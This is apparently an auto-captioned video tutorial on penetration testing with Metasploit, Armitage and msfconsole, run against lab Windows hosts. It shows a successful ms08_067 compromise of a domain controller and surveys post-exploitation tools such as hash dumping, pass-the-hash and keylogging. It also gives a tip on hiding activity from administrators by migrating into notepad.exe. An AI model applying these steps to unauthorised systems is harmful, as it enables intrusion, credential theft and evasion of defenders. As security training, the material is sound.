How-to Penetration Testing and Exploiting with Metasploit + Armitage + msfconsole

Captions
hey guys welcome to another episode of net sec now today we're going to get into discussing exploitation the third phase of the phases of network security and penetration testing so let's start off with the disclaimer any information disclosed in the series is provided for the sole purpose of learning network security we take no responsibility for any misuse of any information we provide we only suggest you audit the systems you have permission on or otherwise in your lab moving forward so the phases of penetration testing right we went through it the first phase was information gathering doing the homework we made a video on that so if you haven't seen that go ahead and check that out first the second video we made was the Recon stage building a case and of course again if you haven't seen these videos guys go on the YouTube channel and check them out today we're going to be discussing as I said the access and exploitation bombs away phase some of the things we're going to be using we'll get into here in just a minute so let's talk about the types of different attacks for exploitation there's a remote attack a client-side attack a blindside attack social engineering attack a fuzzing and denial of service attack and men in the middle attacks so you might be asking yourself why so many different attacks well I'm going to explain just the top three here because that's what we're gonna actually be getting into today actually we'll be getting into the top two but I'm going to explain the blind side attack as well so the remote attack is basically you're trying to exploit services that are vulnerable that a remote service is something like you know NetBIOS or DNS or you know something to that effect a client-side attack on the other hand is something that you're trying to exploit client side wise a vulnerability in Java flash things like that and that kind of ties into the social engineering attack with like the social engineering toolkit which we will be making a whole 
separate video on as well so the blind site attack is an attack that I don't generally recommend using unless you are absolutely at the end of your rope and you are desperate to try to get in or you just want to make sure that you've covered all bases right so a blindside attack is basically firing everything in your tool kit at your target and hoping for something to allow you in okay blindside attacks are very very noisy blindside attacks you know Kenko system damage you know downtime or you know server system crashes things like that so I don't generally recommend that unless it's a last-ditch effort to try to get in to your clients Network okay so let's go ahead and talk about some of the tools that we're going to be using in this episode we're going to be using Metasploit and Armitage Armitage being the front-end GUI version for Metasploit now Armitage is very limited in some aspects I've actually recently if you've been following us on Facebook I posted on that I found a bug inside of Armitage when you're using PS exec and pass the hash attacks it actually will work but it doesn't show that target system as being compromised inside of Armitage however if you emulate and do the exact same thing in MSF console which is the command line version of working with Metasploit you will actually see that it does in fact open a second meterpreter session and you know it does work so we're going to be learning also MSF console because it's really good to have the core fundamental understanding of how Metasploit actually works and again if you run into bugs with Armitage or something you're just not sure is working correctly you can always go back to MSF console and then you could do it in there and see if in fact it does or does not work the old school manual compile and fire basically we're not going to get into that today I try to stay away from that that's mostly if you find private exploits that haven't been made public yet you know really you got to trust the person 
you're downloading the script from and then you have to compile it so if you can't read the code of whatever they whatever language they wrote it in you're kind of taking a crapshoot and whether or not it's actually bad for your system as well as maybe utilizing some sort of attack for the remote assistive remote system so social engineering toolkit we're going to actually make a video separately based upon just the social engineering toolkit or otherwise known as set inside Kali Linux cobalt strike you know that's looks like it's made by the same guy Ralphy on Mudge that Mays made armitage but it's a paid version it is quite expensive we went over that in the past so we're really actually not going to be getting into that are using that even though I believe there's a 14-day free trial on this website you know we're not going to get into Usenet so denial of service attacks guys you're probably never going to use that against your clients when you're doing this professionally there is rare occasions where you might find a vulnerability where it requires you to fuzz or denial a service attack one service or part of a service to get around whatever protections in place and gain the actual access or information you're looking for albeit very rare very rare Google finding vulnerability feed side stare sites like security focus and nsns IT and is Teague of things like that we actually have one on our website learn net set comm on the front page there on the bottom right so also there's various other tools miscellaneous tools in Kali that you might be using you know really it depends on what type of audit you're doing each client is going to be different it's never going to be a set standard of hey well this works every time so I'm going to use this every time you know in talking about exploits and things like that so there's miscellaneous tools for information gathering stuff like that which we've went over in the other videos so we're going to fire up our Kali Linux 
box here okay so in the last video we showed you how to use open boss NBT scan you know and some other tools inside there today we're going to be using Metasploit norma taj and then we're going to be doing MSF console if I can fit that into this video if not I will make a separate video just based upon MSF console it is pretty intense to get used to the syntax of commands and how they work so that might be in a separate video depends on how long this one runs so we'll start off with Metasploit norma taj because that's the easiest to gather okay so the first thing is first our network has changed a little bit since the last video IP addresses may have changed things like that so you want to go ahead and do an NB T scan again you want to do an nmap scan again and then I'll show you how to import your nmap scans and stuff like that inside of Armitage so I've already went ahead and done the end map scans and the NBT scans to find out what the alive hosts were so we're going to go ahead and actually fire up Armitage right now so you go to the applications menu go to the Kali Linux sub menu and then down towards system services go to Metasploit and then community Pro start now if you haven't already you have to register for the free serial key for the community version just go ahead and do that we have actually mentioned that in the video of setting up Metasploit Norma Tasha please go back and reference that video and check it out so the reason why we do it this way is a little bit easier than you know starting a bunch of services as you can see here it starts three services in particular all right so the next step is just to enter in the command Armitage and hit enter so that's going to start the the Armitage front end the first dialogue box you're going to be presented with is actually the login box to get to the database to connect to the database the Postgres SQL database and actually come up here in just a second there we go so just go ahead and click connect 
everything should be fine there in terms of username password it's going to ask if you want to start the RPC server go ahead and click yes don't worry about this connecting to localhost five five five five three connection refuse connection refuse it's actually just trying to establish its connection it may take a minute maybe 30 seconds but eventually it will start Armitage as a service and over times I believe is written in Java so you know with Java you know that there is some lag inside the application itself and there we go it says connecting to database and it's going to go ahead and start Armitage as a front-end so I'm probably going to have to clear out our database here because I was doing some testing when I found the bug inside Armitage so I just want to start fresh with you guys so I'll go ahead and do that here in just a second as soon as it comes up to clear a database at any time guys just go to the host menu at the very top here and just go down to clear database and I'll show you how to do that in msf console as well and just click yes okay so basically we want to start fresh with importing our nmap scan and I'll show you how to do that now there's a couple of different ways that you can actually import hosts into Armitage and I'll show you how for a type here click hosts now you can go to import host which is what you would do if you were importing something from like nmap or you know some other scan you did you can go to add hosts which pops up a box you can add one host per line I don't really recommend that unless you're scanning just one particular IP address but I don't actually ever use that the other option you can do here is an nmap scan now Metasploit itself has an nmap module built into it right I prefer to do my nmap scan separate because if I need to do a specialized type of scan at least I can specify that in the command line parameter flags but in here you could actually choose intense scan intense scan plus UDP intense scan all TCP 
ports it can be quite a bit slower when you do an or massage so be aware of that so if you want to go ahead and just do an intense scan it's going to ask you to enter in your IP address or range so if you had one single IP address if you were doing a remote audit you would go ahead and just enter in the when I address of your client if you were doing an internal audit here of course you can go ahead and enter in your IP address range 192 168 1 dot 0 slash 24 and you can enter that in here I'm actually going to cancel out of this if you also notice that sometimes when you open up dialog boxes there is no cancel or you know close button on some of them just right-click on it and go to close ok so we're going to go ahead and import our nmap scan alright guys so as I said let's go ahead and import our scan here so in order to do that you have to go up to hosts import hosts now if you remember in the last video we try to keep an organizational structure going and we put our over clients information scans etc into their own folder right so if we remember correctly that was an acne ink so just simply go to navigate in there and my fresh scan that I did since the network has changed it's been fresh - scan dot XML so just go ahead and highlight that and click open you can see here on the bottom there's a console and then each task that you do opens up another tab so in fact this one is called import because we're importing now if you notice it'll tell you that it's successfully imported the fresh gained XML okay now you can see here it kind of looks cluttered because everything's stacked on top of each other right so we just go to Auto layout right click in the empty space here go to auto layout click none then go to layout and just click stack that's the one I like best alright so let's pick apart some of the information that's imported here so obviously I did a range scan or cidr scan in nmap as we did in last video so dot one dot one I know is the router so in order to 
make things a little bit simpler to understand I'm going to go ahead and right-click on this one and just go to host and remove host as I don't want to waste time scanning things that I don't you know want to scan so once that happens here now again like I said Armitage is a little bit slow okay so 1.3 I believe is my machine here and let's just double check that yeah 1.3 is this machine here and I have no interest in scanning my host machine that I'm doing these videos office so I'm just going to go ahead and remove this one here as well ok so now we have three hosts alright if you highlight over each one of them and just run your mouse over it's going to tell you what it is so 1.2 says is what Microsoft Windows 7 and if you highlight over this one here it says Microsoft Windows 2000 well I know there's not a 2000 box up on there so then you highlight over this one it says Microsoft Windows XP but that's pretty vague right it didn't really give us too much information I want to know what service packs are in there I want to know you know all that good stuff and while nmap will generally tell us that the import feature and armitage seems not to transfer all that information over ok so in order to do that I want to do all three hosts at once and there's another scan in armitage called MSF scan now this is part of the auxilary part of the scanners which we will explore a little bit in MSF console so you go to host here and then MSF scans it's going to do a more detailed host based analysis of what the Machine actually is now you can also go to nmap scan and quick scan os detect but that may or may not work correctly so in order to do that you just left click anywhere and drag the imaginary box here the highlighted blue box over all three hosts sometimes all three hosts do not have the green box around them so just try to do it again there we go so now all three hosts are selected and I want to go to host MSF scans and you can see it automatically populates the IP 
addresses that I'm looking to scan I'm just going to click OK now this can take a few minutes guys because it's scanning all these different ports for services that are running on them so on and so forth it's going to try to guess the operating system more directly and try to make a better accurate determination of the operating system again you can achieve these same results in nmap but if you're going to use Armitage which I don't really use it very often but if you're going to use it it does help to have as much detailed information in it as possible so you can see here now it's running through auxilary scanners and this is down here what you'll see an MSF console when you go to set and use different things now you can see that the one that said Windows 2000 is actually changed and it says Microsoft Windows XP service pack 3 now you can see that this one here if you highlight over it says Windows Microsoft Windows 2003 service pack 0 what that one was reporting is XP before and this one was reporting as Windows 2000 right so now we got a clear picture of what we're actually working with here now I know 1.9 is statically set for that Windows 2003 standard edition server in our VM box our proxmox virtual machine host server okay so this Windows 7 1 or Windows 7 1 has not changed so that's good alright so now we got our host in here we know exactly what we're looking at if at any time you want to right-click on any one of these and go to services to see what services are going you can go ahead and do that so you can see here on 1.9 we got DNS running on port 53 and it will try to do a banner grab rudimentary better grab and tell you what's running on it we have port 80 open on there as well microsoft iis 6.0 port 88 scarborough security or server time port 135 is Windows RPC then we look at 139 well that's NetBIOS LDAP is running on it SMB which is four four five now when you're doing an audit and if you're like early in the network and you know we'll get into that 
in post exploitation and in our advanced series as well but port 445 is a dangerous port to have open unfortunately there's not too much you can do about that and when your local on a network okay there's a lot of exploits that work on that port for these older versions of Windows like 2003 server Windows XP and even sometimes Windows 7 so then you have que password windows RPC over HTTP and then tcp wraps okay so if you wanted to find out what services are running on this Windows XP machine same thing right click on it go to services and you can see this one's really just running one thirty nine four four five so it's just NetBIOS stuff okay windows seven same thing now if you notice every time you do a task it opens up another tab down here now this can get really confusing and really annoying when you have you know maybe 20 tabs open or something like that so if you find the information you're looking for as you're going through you know you can uncheck or or delete you know some of these tabs by just clicking the X up here so we know we imported our stuff ready we don't need that anymore and we know we did our scan already so we don't need that tab anymore so now we just have our services open for each of three boxes so now you might be asking yourself well that's all great but you know what are we going to get into the exploitation well here's where we come into it so if you remember correctly we did a in the last video in the recon stage we did the open us scan open vas scan whatever you call it now if you remember looking in that PDF there were some ports open and some services and some warnings and things like that so that you use that as a reference guide to try to build your case against what exploit you want to fire at what machine now keep in mind the way that Metasploit works and the way that Armitage works is that you know it kind of goes by what port is open in what service is running on that port so while we may have port 445 open over here on on 
the server it may be patched already against that vulnerability right so you have to keep that in mind that if an exploit doesn't work right away it may be patched they may have done their Windows updates but you know a majority of the time they don't do system-wide updates across the whole entire network or you know maybe they're doing the updates but a machine failed and they have no idea that the machine failed to do the update for whatever reason so you can find a vulnerable target now again you don't want to just go off and blindly fire everything now what I'm going to talking about the blindside attack in terms of using Armitage to do something like that you have to go to attacks and in Hail Mary and what that means is basically it's going to fire everything in the exploit database at that target system okay it's very noisy it can cause systems to crash and you definitely don't want to do that to your client right okay so the first things first you want to find attacks on a machine so you want to find what's vulnerable right so if you just highlighted one machine here and just go to attacks find attacks it's going to go ahead and query all the exploits in a database according to the services and ports that are running here and it's going to try to determine maybe what exploit could be you know used for that port in that service now you can see here when it says attack analysis complete you will now see an attack menu attached to each how each host in the targets window so click OK so if you right click now on the host you can go to attack and it's going to list a bunch of different things so there's an MS o3o 2060 com HTTP this is a bug inside Armitage that I've let Ralphie I'll know about in the past hasn't been fixed yet for whatever reason you can't have something like if you went to let's say let's go to dce/rpc exploit there's some exploits that support a check function and what it does is doesn't actually fire the exploit against the target where does 
the checked it checks the target to see if it's vulnerable to that specific exploit at in hand and then this menu only has one but if you went down to I is you can see that it has three or four of them all right four of them so if you hit check exploits on this it's going to run each exploit itself and try to use the check function now you'll see some of them here say this exploit does not support check so some exploits that were built and verified and put into Metasploit do not support a check function so unfortunately on some of those you're going to have to manually fire them and just see but we're looking for stuff that says you know this target is vulnerable or this work is is is exploitable so you can see on this one here the is MSO 307 ntdll web web Dave module it did do the check and it says the target is not exploitable so we know that right off the top there the MS o 3 if we went to attack and in is so the MSO 307 we're not going to use right we know that right off the bat then this one here is MS ADC says the target is not exploitable so again if we went to attack and in iis and then down here we know that it's not vulnerable to that one so there are ones that said like I said exploit does not support check well the iis web dave upload a s or underscore asp so let's go ahead and try to fire that one right so attack iis and then the is web dave if that's the correct one yes so let's go ahead and click that to fire this exploit now this is actually going to really push the exploit towards the target and see okay so once you do that it opens up a dialog box here and it gives you some options now not every exploit gives you these options some have options automatically picked for you by default you are to change whatever you'd like so targets automatic I usually leave that in automatic sometimes it has other options here which we will see later on where you can choose specific operating system or service to target this one is automatic I try to leave it on 
that if it has that because it will run through it automatically and try it now in order to what using a reverse connection what that means basically is that you whatever payload it's going to use to send to the target once the exploit has passed and then it comes back to us to pick up the payload we can try to use a reverse connection like a reverse tcp reverse dns or a bind tcp bind dns and things like that and we will get into that when we're using msf console it will show you the differences you also have an option here is called show Advanced Options and if you check that now our option menu has changed before we get into changing any options let's go ahead and take a look at the very top here if you if you read this it says this module can be used it just gives you a brief overview of what this exploits actually about this module can be used to execute a payload on iis servers that have the world writable directories the payload is uploaded as an ASP script using a web Dave put request ok pretty simple pretty straightforward l host is your localhost which is your machine that you're you're attacking from right so I know that this is the IP address of my Kali Linux box and I can simply go ahead and find that out here by just issuing the ifconfig command right so this is our IP address so we know that that's correct once minimize this ok so l port you can leave this or you can change it if you want to change any of these options under the value or the right-hand tab here you can do that let me just close this out here restart this again Armitage is a little bit buggy so sometimes you have to kind of do things twice ok so the L port you can see has changed if we wanted to change this you right you left-click on it once to highlight it in blue and then on the right-hand panel here you left-click it again sometimes you have to do it two or three times until you have a cursor in the box as you can see so if I want to change this to you know dot one are 25 721 I 
could but I'm just going to leave it at default you could change the path if you wanted to I don't recommend doing that proxies now you could use proxy chains to do this however inside Armitage it is a little bit buggy to use proxies when we get into MSF console I will show you how to set global proxies to use proxy chains and proxy chains is something we've discussed over a couple of videos and so you know applying that to using Metasploit with that you can actually set up like an SSH pivot or a pivot through machines things like that you can use proxies to attack from so on and so forth our hosts obviously is remote host and that's the target machine that we're after and of course I was automatically selected because that's the machine that we're targeting our port is 80 you can leave this unless I is is running on another port like 8080 or something like that you would change it in here again doing that V host you don't have to really worry about V host on most of these and show Advanced Options again you can change the domain name now we should have known that you know if you did like an MBT scan or something like that or even the nmap scan it's going to tell you what domain it's actually running on alright so if we wanted to do that you could alright but you should have this knowledge at hand first we end you know before anything so I'm actually going to change this option here workstation and I'm going to name this to the domain that it's working on so it's Acme Inc dot local ok so there's other different options you can change in here I really don't generally change most of this stuff I kind of just leave it the way it is unless of course we're using proxies but again I don't really use professionally armitage very much so I'm going to always want to try for a reverse connection right because I don't really want to try a bind attack I want to try a reverse connection so let's go ahead and check that and click Launch as you can see here it opens up another 
tab and exploit tab and it says exploit running is background job started reverse handler on the IP address of our machine here okay uploading the bytes to whatever text file it's creating here upload failed 403 forbidden so that means that it doesn't have the it's not really vulnerable because it doesn't have the post option as we saw in the description of the actual exploit it doesn't have post enabled on that on that specific service ok so that exploit pretty much failed ok so the other thing you could do if you notice that you have a vulnerability that's been known to work on this specific service pack so on and so forth that you know you're pretty confident is going to work like an MS o 8 o 67 for instance you can always search for that in this box now let's say you went to open boss and you did your scan and you were like hey it's vulnerable to MS o 8 o 67 but instead of going through the attack menu here and trying to find each one of those you know MS o 867 you know so and so forth you can actually always search for it in here MS o 8 and it'll bring up anything that starts with MS o 8 right so you can see that MS o8 o 67 is down here there's an MS o 8 o 78 so on and so forth right and this is all browser-based stuff and you can see the directory tree is auxilary exploit and that's pretty much it that comes up in MS o 8 but if you erase this you can see that there's four directories in here auxilary which is going to be most of your scanners fuzzers things like that and brute force attackers exploits going to be where your exploits are actually loaded into and your payload directory is going to be where your payloads are into so if you expanded this in the payload directory you can see that it has a bunch of different sub directories in there as well so if we were working with this Windows machine here we can go through here we can use there's a add user payload the meterpreter is the really popular one that most people use and you can see and here if we 
just move this menu over a little bit there is a bunch of different things in here bind IP version 6 TCP bye know NX tcp bind tcp reverse tcp reverse HTTP I mean there's there's a bunch of different stuff in here right reverse TCP DNS all that good stuff alright so those are all your mature Pater's sub shells in here and these are all of your windows payloads as well okay so if we went into the post directory again you can go under windows and you can go under the various now post is for like post exploitation which we are going to get into that in the next video so again let's not get too ahead of ourselves here let's go ahead and say that MSO 8 o 67 under attack and if we went to SMB MS o 8 o 67 well let's go ahead and check all the exploits here because we want to know which ones are actually going to work which ones aren't so we're not guessing in wasting time let's go ahead and do that oh here we go so we can see and we'll just wait here for the results to come by because the screen Scrolls pretty fast and again some of them don't support check guys so you really gonna have to just manually fire that one off at them okay so let's scroll up here the very first one I tried was MSO 8 o 67 net API very common very popular in Windows XP Windows 2000 Windows 2003 server world ok there was patches for it in various service packs Microsoft Windows XP was vulnerable way up to service pack 3 and an additional couple of updates to actually patch that so anytime it says the target is vulnerable well we know that we can fire that exploit against the target and confidence that it's more than likely 9 at 10 times going to work ok now there is some false negatives and positives that you know are reported back like with any other tool so we scrolling down here we notice the rest of them don't support check but we know that ones vulnerable let's go ahead and actually fire that one off so right click on it go to attack and then and the menus are kind of a little finicky when you 
when you're putting your mouse on it, so sometimes you have to do it twice. So go back down to SMB and you can see that it says (and we'll be getting through this in the msfconsole part of this) use windows/smb/ms08_067. Now that's what you would do in msfconsole. Right-click, go to Attack again, SMB, and then choose ms08_067_netapi, because we know that that one, according to the check option, is vulnerable. Let's go ahead and click on that. So let's just read briefly what the actual description of this exploit is. It says: "This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll." Well, sometimes these descriptions will tell us what the targets are that are actually vulnerable, so reading down here a little bit: "The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts." So pretty much on Windows 2003 Server you only get one shot at this, right? So you have to make it count. If for some reason you set something wrong, something gets messed up, that's when it might crash, and then when you try to run the exploit again it might not be vulnerable to it, OK, because it may have crashed that service. So it's just giving you a heads up to, you know, watch out for that. "This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development." OK, so again, LHOST is us, LPORT we'll just leave that, RHOST is fine, RPORT is fine, and again you can see now when we click on Targets we have a bunch of different types of targets in here. We're just going to leave this on Automatic Targeting, and I want to do a reverse connection because it is available, so I'm going to go ahead and click Launch. Here you can see that it's actually exploiting, and it's giving you the fingerprint, and here we go. When it starts to say "Sending
stage" down here in the console menu, you know that you're pretty much going to get that box, OK? And then it says "Meterpreter session 1 opened" and it gives you the options. Now you have a meterpreter shell command line here, and we're going to get into that in msfconsole as well. The beautiful thing about Armitage is it gives you the graphical user bells-and-whistles interface to say, "hey, look, this target's compromised," OK? So you can see that once the target's compromised, the monitor picture up here turns red, has lightning bolts through it and all that good stuff. So now the information underneath that says we're running this exploit, you know, completed, and it's running as SYSTEM. So we're like God on that machine right now, and since that's a domain controller, that's horrible news for them but great news for us, right? So we basically just took down their main, you know, server, and now we have SYSTEM-level access to that, which is great, because now we don't have to escalate privileges and, you know, go through all that nonsense. So right-clicking on here you now see a new option inside of the menu, and it's Meterpreter 1, and if you opened a second, you know, exploit on this, it would be Meterpreter 2, Meterpreter 3, so on and so forth. Now this we'll get into in post-exploitation, but just to give you a brief overview, because I feel it's important to have that before we, you know, precursor into the next video: if you go through the submenu here of Meterpreter 1, you have Access. You can migrate your process; we don't have to, we're SYSTEM already, but if you wanted to, you could. You might migrate it by default to notepad.exe, so if Mr.
sysadmin is looking in on that specific computer (the server, in this case) for whatever reason, he's not going to see that, you know, while we're firing commands and doing tasks on that machine, that, you know, the system service is hammered to death, right, and it's not maxing out the CPU. So if we were doing it under notepad, that's less suspicious, like, "oh well, the notepad process just got stuck," and he's probably not going to kill it anyway. So scrolling through here, you've got Escalate Privileges. Now again, we're at SYSTEM, so we're not going to, you know, escalate our privileges at all. You have Steal Token, Dump Hashes, which we will be getting into. This will dump all the usernames and passwords for the Windows domain controller, and since we're on the Windows domain controller this is really, really bad for them but really, really good for us, right? Because once we do that we have two options. We can try to crack the, you know, the hashes, and we'll get into that; we would be using hashcat and John the Ripper and all that good stuff. We could try to crack the hashes, or we can use another attack called pass-the-hash with psexec. Now, the bug that I found in Armitage, and I'm still trying to... I'm going to make an actual video for Raphael so he understands what the heck I'm talking about, because I posted it on Facebook and he doesn't really... he's saying that it works, but we all know that it's not, I mean, it's pretty obvious. Anyway, so you have two methods of doing that, the lsass method and the registry method; either one you choose is going to work just fine. So in doing past sessions you have Interact; you can have a command shell on there, the meterpreter shell, which we already have down here towards the bottom. You can do, let's see, Desktop (VNC); it's going to open up a VNC server so you can actually look at their desktop and what they're doing. However, I don't recommend that usually, because it will lag their machine a little bit; they might know something's up. Anyway, Explore: you can Browse Files, Show
Processes, Log Keystrokes, Screenshot, Webcam Shot, and there's Post Modules. Pivoting, we will get into that in the post-exploitation. Basically pivoting means that you now take that one compromised host and you're running all of your additional attacks to the other hosts on the network through that compromised host, so essentially you're furthering yourself away from being detected, because if they had like host-based intrusion detection systems or host-based firewalls and stuff like that, they're more than likely going to say, "hey, it's cool, because you're part of our local subnet, we're not banning you from doing anything," right? So that's the reason behind pivoting, OK? You have an ARP Scan, which you would use probably to find out all the other live hosts on the network if you haven't already. Now this works great when you're doing a remote pen test and you find a server that's, like, you know, I don't know, out on the network, has an open port for a web server, email server, you wind up compromising that, but you want to know how many more machines are behind that network. You can go ahead and do an ARP scan and it will go ahead and try to find all the other available IP addresses. And you also have the Kill option here, the Kill menu here, which basically kills your meterpreter session. Each time you compromise a host and you take screenshots or, you know, video of it, or proof somehow or some other way, it's always advised to kill the session after you are done, because somebody could hijack your meterpreter session, being the bad guy, could hijack your meterpreter session and cause havoc for your customers. So always kill your sessions as you're backing out, one machine at a time, kill your sessions, OK? So anyway, now you have Services again, Scan again, and Host again and all that good stuff. Now we don't need to attack this one any further, right, because we've already got this host compromised, we're in, that's it, end of story, game over for this host. So now 1.4, this one
here is our Windows XP Service Pack 3. Well, gee, let's try to go to Attack and let's go over to SMB, because that's always such a fancy one to attack, that service there. And you can see ms08_067 is listed again, ms10_061_spoolss is listed again, and we have a pass-the-hash option, which again, if we had the hashes already from the Windows server, we would right-click on this one here and go to Pass the Hash, and of course in our module, I said there's a bug and it will succeed, but it won't show the host is compromised up here on the GUI screen. Anyway, so let's go to this SMB and let's go ahead and check all these exploits. So you can see it's checking ms08_067, and while ms08_067 said that Windows XP up to Service Pack 3 is vulnerable, again, as I said in the beginning, it could be patched, so it's just going off the port and the service that's running on that port; it's not checking legitimately whether it is patched or not. In this case, on the ms08_067, I'm sorry, it is checking if it's patched or not, and it's saying the target is not vulnerable. I know that that machine automatically did some updates before I shut them off, so I know that it was vulnerable at one time, but the updates took care of that vulnerability, right? So again, you may come into a mixed network where you find some targets, you know, their updates may have failed, or maybe the sysadmin is just not doing updates on that specific machine for whatever reason. There might be an update that conflicted with one of their line-of-business apps that are running on there, or something like that. So there are some times where you're going to find that the sysadmin intentionally does not do updates on one machine, and 9 out of 10 times, guys, or maybe 8 out of 10 times, guys, to be honest with you, it's on Windows servers, domain controllers. For some reason they don't want to update it, because they're afraid that it may break the OS, which Windows updates, let's face it, have been known to do for ages, will break the
system, and if it breaks their server, guess what, their whole network is down, right? So they don't want to break that, so they're just not doing updates on that server. Bad news again for them, good news for us, OK? So as you can see here, it went through all of its checks, and there were quite a few here that didn't support check; ms10_061_spoolss did not support check. So let's go ahead and, because we know ms08_067, which we used to compromise the Windows 2003 server here, is not exploitable on this target machine here, OK, let's go ahead and try to fire off the ms10_061. I'll right-click on it again and go to Attack, SMB, ms10_061. OK, so let's go ahead and leave all these options in here. Good, I want to use a reverse connection, and I also want to Show Advanced Options. So scrolling down in here, just to make sure everything is set up correctly, and it looks like everything in here is good. It doesn't give us a domain option to change that, or a workstation option to change that. Reading the description, it says the module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061 by making specific DCERPC requests to StartDocPrinter, so spoolss, it's against the printer service. So it doesn't really tell us what versions of Windows are actually exploitable to this, so let's just go ahead and launch this and see if it'll actually work. Now you can see it's setting all of its options, what you would be doing in, you know, msfconsole, which is pretty easy, because you can set globals in there, so it makes things a little bit easier for you. So it says "Exploit failed [no-access]: the server responded with this error status: Access Denied." OK, so guess what, it wasn't vulnerable to that. Well, we can check other vulnerabilities if we want on here, but again, this is where it's important to have your, you know, PDF export, or whatever export you did from OpenVAS, to see if it did in fact find any vulnerabilities on that machine, so this way
you're not wasting an exorbitant amount of time trying each one of these individually, or trying to do the check option, which some of them may fail, so you have to inherently do that manually and fire each one. So you can see that there's an Oracle one, there's a Samba one. Let's try the Oracle and just do check against it, so we're not actually firing. It says "This target is not exploitable," OK, so we know that that's out. Let's go ahead and, even though Samba is probably not going to work for this, let's go ahead and check exploits on that. Well, it says it doesn't support checks, so we've got to manually go back and actually fire this. So reading in here, you can sometimes determine whether or not it's worth your time to actually fire this exploit over at it; is it worth the fact of maybe being caught? "This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default 'username map script' option." OK, so it doesn't really tell us what it's going against, so we can really just go ahead and click Show Advanced Options, just make sure if there's anything that we might change that might change our ability to actually exploit this. And we could probably try to change the domain if you wanted to; we'll just name this AcmeInc.local, which is the domain that domain controller is part of. If you had usernames and passwords you could try to put them in over here; we don't have any usernames, passwords yet, so let's just go ahead and click Launch, and you see "Exploit failed"; there's no... it's not vulnerable to that exploit. All right, so we basically tried almost all of them, guys. Again, using psexec would use a pass-the-hash attack, so you'd have to dump the hashes from the server or another compromised machine and try to pass those along the domain to the other workstations or servers in the domain. Now generally speaking, when a Windows domain controller is on a network and everybody
is connecting to that, it uses LDAP and the back end of Active Directory to store usernames and passwords, so you can authenticate to the actual domain controller and say, "hey, yeah, I'm part of the domain, give me an IP address, give me shared folders, give me, you know, Active Directory access to certain things, give me printers, give me all that good stuff," right? So when you're using pass-the-hash you're basically dumping all those hashes that were in the domain controller and trying to pass it along to the workstations, in hopes that the administrator, which they normally do, adds themselves to each machine so they can remote in and fix things, whatever, or give the other local users different privileges, so on and so forth. So you want to try to pass the hash across that and it should compromise the machine, and you do have the option to set a payload like a reverse TCP meterpreter shell, and that machine would in turn be compromised. Again, we'll get into all this in post-exploitation, but I just want to touch on it so you guys know what you're looking at. So obviously, again, we could see this dialog box here doesn't have a close option or any kind of minimize option, so again right-click on it and just go to Close. So it looks like we're not getting access to this target just yet; however, if we use the pass-the-hash attack there is a chance that we can still get in. Now this is basically just a remote attack. If we did a client-side attack, where we couldn't get in remotely any other way, like there were no other services that were vulnerable, we might use a client-side attack, and the client-side attack is using something like the Social-Engineer Toolkit, tricking a user to download a payload, or basically an exploit and the payload from us, so that uses a little bit of social engineering as well. Let's move on to our Windows 7 host. Again, if you go under the Attack menu you can see here that it says ms03_026_dcom. Well, let's go ahead and click on that and let's read the description. This is
where it's going to come in handy, OK? So it gives us some operating systems that are vulnerable to this. So "this module can exploit the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request." Well, we know this is a Windows 7 machine; we're not really working with, you know, any of that stuff, right? And if you go down to your Targets option, those are the only options that are selected, so we're not even going to bother firing that one, because guess what, it's probably not going to work. So right-click again, go to Attack. So the DCERPC is out. Oracle, ah, let's not worry about that one here. Samba, this one here. So now it has an ms08_067, but here's the thing, guys: if you went up here and you went to Hosts, since that's the only one that's selected, I'm sorry, Attacks, and Find Attacks, it's going to go ahead and query exploits for that as well. So just do that, just to make sure that we're not missing anything here, and it doesn't look like we're missing anything, OK? So again, ms08_067, if we click on that, we know that that's only working for Windows XP and Windows 2003, so let's close that, and it doesn't look like we really have any other thing on the way in. Now you can always double-check what exploits are available for Windows 7 by searching online or something like that, but again, reference your OpenVAS PDF. So opening up Armitage again, the other thing we could try to do on here besides the client-side attack is again a pass-the-hash attack, to see if we can log into this machine and compromise it. Once we do that, if we opened up a meterpreter shell, guess what, we have access on that system, right? So we could take screenshots, we could do keylogs, we can, you know, escalate privileges, we can... there's a whole myriad of stuff we'll get to in post-exploitation, but this just gives you a brief overview of how Armitage actually works compromising one host. Now, using the same knowledge, we're going to try to compromise the host inside of
msfconsole. All right, guys, so that pretty much takes care of Armitage. We're going to get into msfconsole quickly. The first thing you need to know is you always need to go to the Applications menu, Kali Linux, and in System Services start the Metasploit Community / Pro services. Since we've already used Armitage in the same video, those services are already started for us. So simply to start msfconsole, just in a command line or in the terminal type in msfconsole and hit Enter, and it may take about a minute or so to actually load it up. The other thing worth noting is every time you use Metasploit you should probably do an update, msfupdate. You don't have to be in the Metasploit console to do that; the msfconsole, you don't have to be in there to do that, you can actually just issue that from a command line, it'll do it for you. So when you start it up you'll see here that it will tell you the version here on the bottom, and how many exploits, auxiliary modules, post modules, payloads, encoders and nops are in the database, OK? So I haven't updated mine in a while, because this is just the lab box here, and since we're working with older Windows machines I know it's going to be just fine. So let me just clear this out here. OK, so there's a couple of things that you should know right off the bat, OK? First things first is, if you wanted to use the import function like we used in Armitage, there's a couple of different ways to do that. We want to import our nmap scan results. So when you're in your msfconsole, if you ever need help just type in the help command and it's going to give you a list of options that you can use at the core to do things that you need to do. So you can notice a couple of things we're going to go over here: set and setg. set is used to set parameters or options inside of a payload or an exploit or scanner, so on and so forth. setg is to set global parameters, so if we're working with just one specific target IP address or range, we can set that as a
